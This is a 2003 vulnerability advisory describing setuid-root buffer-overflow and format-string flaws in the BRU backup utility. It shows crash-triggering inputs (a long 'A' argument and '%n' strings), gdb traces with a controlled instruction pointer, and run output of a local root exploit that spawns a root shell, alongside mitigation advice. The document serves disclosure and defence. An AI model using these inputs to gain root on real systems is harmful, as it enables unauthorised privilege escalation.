Secure Network Operations, Inc.           http://www.secnetops.com Anvil IDS appliance http://www.secnetops.com/products Strategic Reconnaissance Team               research@secnetops.com Team Lead Contact                                 kf@secnetops.com Our Mission: ************************************************************************ Secure Network Operations offers expertise in Networking, Intrusion Detection Systems (IDS), Software Security Validation, and Corporate/Private Network Security. Our mission is to facilitate a secure and reliable Internet and inter-enterprise communications infrastructure through the products and services we offer. Quick Summary: ************************************************************************ Advisory Number         : SRT2003-07-16-0358 Product                 : Backup and Restore Utility for Unix (BRU) Version                 : <= 17.0 Vendor                  : http://www.tolisgroup.com (purchased EST code) Class                   : local Criticality             : Medium to Low Operating System(s)     : *nix High Level Explanation ************************************************************************ High Level Description  : bru has buffer overflow and format issues What to do              : upgrade to the Tolisgroup BRU or chmod -s bru Technical Details ************************************************************************ Proof Of Concept Status : SNO has exploits for the described situation Low Level Description   : EST BRU(TM) Backup and Restore Utility is the No. 1 award winning product for Linux backup, having won more awards and maintained a larger installed base than any other commercial Linux backup solution. A respected industry veteran, EST has been developing UNIX backup products since 1985. Enhanced Software Technologies Inc. the previous vendor of BRU has sold its product to the current vendor The Tolisgroup. As described by The Tolisgroup, BRU is backup science at its best. By exacting design, BRU solutions never abort the restore and recover the most data of any backup solution. In the past there have been a few issues with BRU reported to the public. One such issue (BRUEXECLOG) has prompted the vendor to remove the suid bit from BRU. The current Tolisgroup version of BRU does not by default ship with the suid bit set, however we feel it is possible users could read old suggestions on newsgroups or the web and chmod +s bru. The Tolisgroup has never shipped BRU with a suid bit. In the past BRU would prompt regular users to set the suid bit on BRU however I can not confirm that the Tolisgroup version has ever had this behavior. elguapo@gentoo elguapo $ bru bru: [W171] warning - BRU must be owned by root and have suid bit set By default BRU-15.1-3.i386.rpm has the suid bit, BRU2000-15.0P-1.i386.rpm however does not. Both versions will prompt a user to set the bit if it does not already exist. The below mentioned issues DO affect the Tolisgroup version however if the user has not set the suid bit there is no problem. The Tolisgroup has stated it will take measures to ensure in the future BRU does not contain the potential to be exploited. The 2 issues at hand can be reproduced as follows... elguapo@gentoo elguapo $ /bru/bru `perl -e 'print "A" x 3050'` bru: [E155] error - memory fault (SIGSEGV) elguapo@gentoo elguapo $ /bru/bru %n%n%n%n bru: [E155] error - memory fault (SIGSEGV) Both issues appear to be caused by poor usage of vsprintf(). Starting program: /bin/bru %n%n%n%n%n Program received signal SIGSEGV, Segmentation fault. 0x40071d96 in vfprintf () from /lib/libc.so.6 (gdb) bt #0 0x40071d96 in vfprintf () from /lib/libc.so.6 #1 0x0805543a in step () Starting program: /bin/bru `perl -e 'print "A" x 3025'` Program received signal SIGSEGV, Segmentation fault. 0x08060027 in step () (gdb) bt #0 0x08060027 in step () Cannot access memory at address 0x41414141 These issues can easily be exploited by an attacker to gain root access. elguapo@gentoo tmp $ head ./0x82-BRU_overformat.c /* ** ** backup and restore utility (BRU) local root exploit. ** Target package: BRU-15.1-3.i386.rpm ** ** bug found by "Kevin Finisterre"(KF), . ** exploit by "you dong-hun"(Xpl017Elz), . ** My World: http://x82.i21c.net & http://x82.inetcop.org ** */ elguapo@gentoo tmp $ cc -o 0x82-BRU_overformat 0x82-BRU_overformat.c elguapo@gentoo tmp $ ./0x82-BRU_overformat 1 0x82-BRU_overformat - backup and restore utility (BRU) local root exploit. Target package: BRU-15.1-3.i386.rpm [*] shellcode: 0xbfffff9e [*] It's my message: KFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFK... KFKFKFKFKFKFKFKFKFKFKFKFKFKFKFKFthanks!!˙˙ż sh-2.05b# id uid=0(root) gid=0(root) groups=100(users),10(wheel) elguapo@gentoo tmp $ ./0x82-BRU_overformat 2 0x82-BRU_overformat - backup and restore utility (BRU) local root exploit. Target package: BRU-15.1-3.i386.rpm [*] shellcode: 0xbfffff9e, $-flag: 70, pad: 0 x82: [E155] error - memory fault (SIGSEGV) ... [*] shellcode: 0xbfffff9e, $-flag: 73, pad: 2 x82: [E001] specify mode (-cdeghitx) sh-2.05b# id uid=0(root) gid=0(root) groups=100(users),10(wheel) Patch or Workaround : chmod -s /path/to/bru or Purchase BRU from The Tolisgroup. Vendor Status           : Original vendor no longer exists. The Tolisgroup BRU is not vulnerable by default, please upgrade. Bugtraq URL             : to be assigned ------------------------------------------------------------------------ This advisory was released by Secure Network Operations,Inc. as a matter of notification to help administrators protect their networks against the described vulnerability. Exploit source code is no longer released in our advisories. Contact research@secnetops.com for information on how to obtain exploit information.